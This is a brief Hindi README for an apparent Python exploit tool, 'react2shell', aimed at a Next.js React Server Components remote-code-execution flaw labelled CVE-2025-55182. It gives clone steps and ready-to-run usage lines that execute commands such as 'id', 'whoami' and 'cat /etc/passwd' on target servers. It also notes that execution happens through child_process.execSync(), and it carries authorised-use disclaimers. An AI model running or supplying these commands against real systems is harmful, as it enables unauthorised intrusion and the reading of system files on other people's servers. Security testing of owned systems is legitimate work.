
एक शोषण उपकरण Next.js भेद्यता CVE-2025-55182 के लिए जो React Server Components में प्रोटोटाइप विषाक्तता के माध्यम से रिमोट कमांड निष्पादन की अनुमति देता है।
Next.js React सर्वर घटकों की RCE कमजोरी के लिए पायथन शोषण, HTTP/HTTPS समर्थन के साथ।
# Clone & run
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<command>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
केवल अधिकृत सुरक्षा परीक्षण के लिए।
केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। अवैध गतिविधियों के लिए कभी उपयोग न करें।
child_process.execSync() के माध्यम से RCE ट्रिगर करता हैMIT लाइसेंस – LICENSE फ़ाइल देखें
अस्वीकरण: केवल शैक्षिक उद्देश्यों के लिए। हमेशा उचित प्राधिकरण प्राप्त करें।
अंतिम अद्यतन: 8 फरवरी, 2025
संस्करण: 2.0.0
अनुरक्षक: BrianLopezM99